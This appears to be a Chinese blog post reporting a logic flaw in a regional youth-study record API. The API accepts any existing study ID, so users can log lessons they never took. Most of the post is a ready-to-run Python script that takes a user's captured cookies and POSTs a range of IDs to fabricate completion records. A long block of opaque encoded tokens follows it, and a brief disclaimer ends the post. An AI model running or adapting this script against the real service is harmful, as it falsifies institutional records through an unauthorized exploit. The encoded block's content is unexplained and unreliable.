汉东省“青年大学习”学习记录统计API漏洞

19 分钟阅读

Summary

汉东省“青年大学习”学习记录API(http://api.xxx.cn/WANGLUOAPI/XUEXI/TIANJIAXUEXIJILU)存在不验证“仅限本期学习”问题,导致该API允许接收任何已存在的学习ID(XUEXIID)。API使用Cookies(You-Know-It-1)验证用户身份并接收POST请求统计学习记录。

直接POST对应的学习ID即可统计成功。值得注意的是,系统显示的学习记录时间为POST时间,明显未通过正常渠道获得。

漏洞利用代码示例

# Fuck-Handong-QNDXX
# Author:You-Know-Who
# Fixed by Sunset
# Python 3
# Open Source with Do What The Fuck You Want To Public License
import requests
import time

print("请尽量确保手机和此设备处于同一网络环境下并使用Fiddler抓包获得的信息")
myua = input("请输入你的UserAgent:")
mycookies = input("请输入你的Cookies:You-Know-It-1=")


headers = {'user-agent': str(myua), 'cookie': 'You-Know-It-1='+str(mycookies), 'origin': 'http://front.xxx.cn', 'referer': 'http://front.xxx.cn/XUEXI',
           "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "com.tencent.mm", "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7"}

# API URL
url = 'http://api.xxx.cn/WANGLUOAPI/XUEXI/TIANJIAXUEXIJILU'

fromwhere = input("请输入开始ID:")
towhere = input("请输入截止ID:")

for id in range(int(fromwhere), int(towhere)+1):
    postreq = "Init"
    data = {'XUEXIID': str(id), 'LINGPAI': ''}
    print("----------")
    print(id)
    print("POST:"+str(data))
    postreq = requests.post(url, headers=headers, data=data)
    print(str(postreq))
    print(str(postreq.text))
    print("----------")
    time.sleep(1)

print("完成")


# ZwtZwtZ WTZwTzW TZwTzwT ZWTzWTz WTZwTzw TzWtZW TZwTzwT ZwTzWT ZWtZwTZ WtZwTZ WtZwTZW TzwtZWt ZWTzwtz WTzwTzW TzWtzWT ZWTzwT ZWtZWTZ WtzWTZW TZwtZwT ZWtzwtZ WTzWtzw TzwtZwT ZwtZWTz WTZwTZw TZwtzWt ZWtzWt ZWTzWtz WTZwtzw TzWTzWt ZwTZwtz WtZwtzw TZWtZWt ZWTzWTz WtzWtZw TZWtzwt ZwtzwTZ WtZwtZw TzwtZWT ZwTzWTz WTzWtZW TzWTzwt ZWtzwt ZWtZwtz WTzWTzw TzWTzwT ZwTzWTZ WtZwtZw TZwTZwt ZWtzwTZ WTzWtZW TZWtZwt ZWtZWtz WTzwTzW TzWtZwt ZWtzwt ZWtZwtZ WtzwTzw TzWtzwT ZWtZWTZ WTzWTZw TZwtzWt ZWtzWT ZwtZwTz WTZwtzw TzWTzWt ZWtzWt ZWtZWtz WTZwTzW TzwTzWt ZWTZwTz WTzWTZW TZwtZWT ZwtZwTz WTzwTz WTzWtzw TZwtzw TZwtZwt ZwtZwtz WtzwtzW TZwTZw TzwTZwt ZWTZwtZ WTZwtZ WTzwTZ WtZWtZw TzWtZWT ZwtZwTz WTZWtZw TzWTzWt ZwTzWTZ WtzWTZw TZWtZWt ZWtzwTz WTzWTzW TzWtzwT ZWTzWtZ WTzwtZw TzwtZWT ZWtZwT ZWtZWTz WTzwtZW TzWTzwt ZwTzwtZ WTZwTzW TZwtzWT ZWtzWt ZWtZwtz WTzWTzw TzWTzwT ZWtzWt ZWtZwtz WTzWTzw TZwtzWt ZwTzwTZ WTzWtZ WTzWtZw TZwtzWt ZWtZwtZ WTzwtZW TZWtzWT ZwtZwtZ WtzwtZW TZwtZwt ZWTZwtZ WtZWtZw TzWtZWT ZwTZwTz WTzWTzw TZwtzWT ZWtZWtZ WtZwTZw TZWTzwT ZwtZwTz WTZWtZw TZwTZWT ZWtzWTZ WtzWtZw TZwtZw TZwTzwt ZWtzwt ZWtzWtz WtzWtzw TzwtzwT ZWtZWt ZwtZWtz WTZWtzW TZWtzW TZwtZW TzWTzWt ZwTzWTZ WtzWtZw TZWTzWt ZwTZwTz WtZwTZW TzwTZWt ZWTzWTz WTzwtZw TZwTZwT ZwTzwtZ WTZwTzW TZwtzWt ZwtzWTZ WTzWtZ WTzWTZw TZwtzWT ZwTZwtz WtZwtzW TZWtZwT ZWtzwTZ WTzwTz WTzWtzw TZwTZwt ZwTZwtZ WTzwTz WTzWtzw TZwTZwt ZWtzwTz WtZwtZW TZwTzW TZwTzWt ZWtzwTz WTzWtzW TZWtzW TZWTzWt ZWtzWtz WtzWtzw TzWtZWt ZWtZwTZ WTzwTzW TzWtzWT ZWtzwTZ WtzWTZw TzwtzWT ZWtZWTz WtZwTZw TZWTzwT ZWtzwTz WtzwtZW TzwtzwT ZWTzwT ZwtZwtZ WtzwtZW TZwtZwt ZWtZWTZ WTzwTzw TzwTzwt ZwTzwTz WTZwTZW TzwTZWT ZWtZwtZ WTZwtz WTZwTZw TzWTzwT ZwTZwtz WtzwtZw TZWtzwt ZwtZWtz WTzWTzW TZWTzwt ZWTzWtZ WtZWtZw TZwtZW TzwtZWt ZWtzwt ZwtZWtz WTzWTZw TzwTZWt ZWtZWTZ WtZWtZw TzWtZWT ZwtZWTz WTzWTZW TzWTzWt ZwTzWTZ WTzwtz WTZwTzW TzWTzwT ZWtzWt ZWtZwt ZWTzWTz WTzwTzw TZwtZw TzWtZWt ZWtZwtZ WtZWtzW TzWTzwt ZwtzwTz WTZwtzw TzwTZwt ZWtzWt ZWTZwtz WTzWTzw TzWTzwT ZwTZwtz WtzWtZw TZWtZwT ZwtZWtz WTzwTz WtzwTZw TZwTzWT ZwTZwTz WtzwTZW TZWTzwt ZWtZWtz WtZWtzW TzWTzwt ZwtZwTz WTZwTzW TZwtzWt ZwtzWTZ WTZwtZ WTzWTZw TzwTzWt ZWTzWTZ WTzwtz WtzWtZW TzwTzwT ZwtzwTZ WtzwtzW TZwtZWT ZwtZwtZ WtzwTZW TzWtzWt ZWtZwtz WTzwTzw TzwtZWT ZwtzWtZ WTzwTZW TzWtzwt ZwTzwTZ WtzwtZw TZwTZW TzwTzWt ZWtzWt ZWTZwtz WTZwtzw TzWTzWt ZwtzwTZ WTzwtZW TZwTZw TzwTzwT ZwtZwtz WtzWTZw TZwtzw TZwtzWT ZWtZwtZ WTzWtzw TZWtzwt ZwTZwTz WtzwtZW TZwTzWT ZWTzwTZ WtzWtzW TzwtzWT ZWtzWtz WTzwtz WTzwtZw TZwtZw TZWtZwt ZWtZWtz WTzwtZw TZwTzwT ZWtzwTZ WTzWTz WtzWtzW TzwtzWT ZWtzwTZ WTzWTZw TZwtZWt ZwTzwtZ WTZWtZ WTZWtZ

免责声明

此漏洞公开报告仅供技术交流,任何人的不恰当操作与作者无关。

留下评论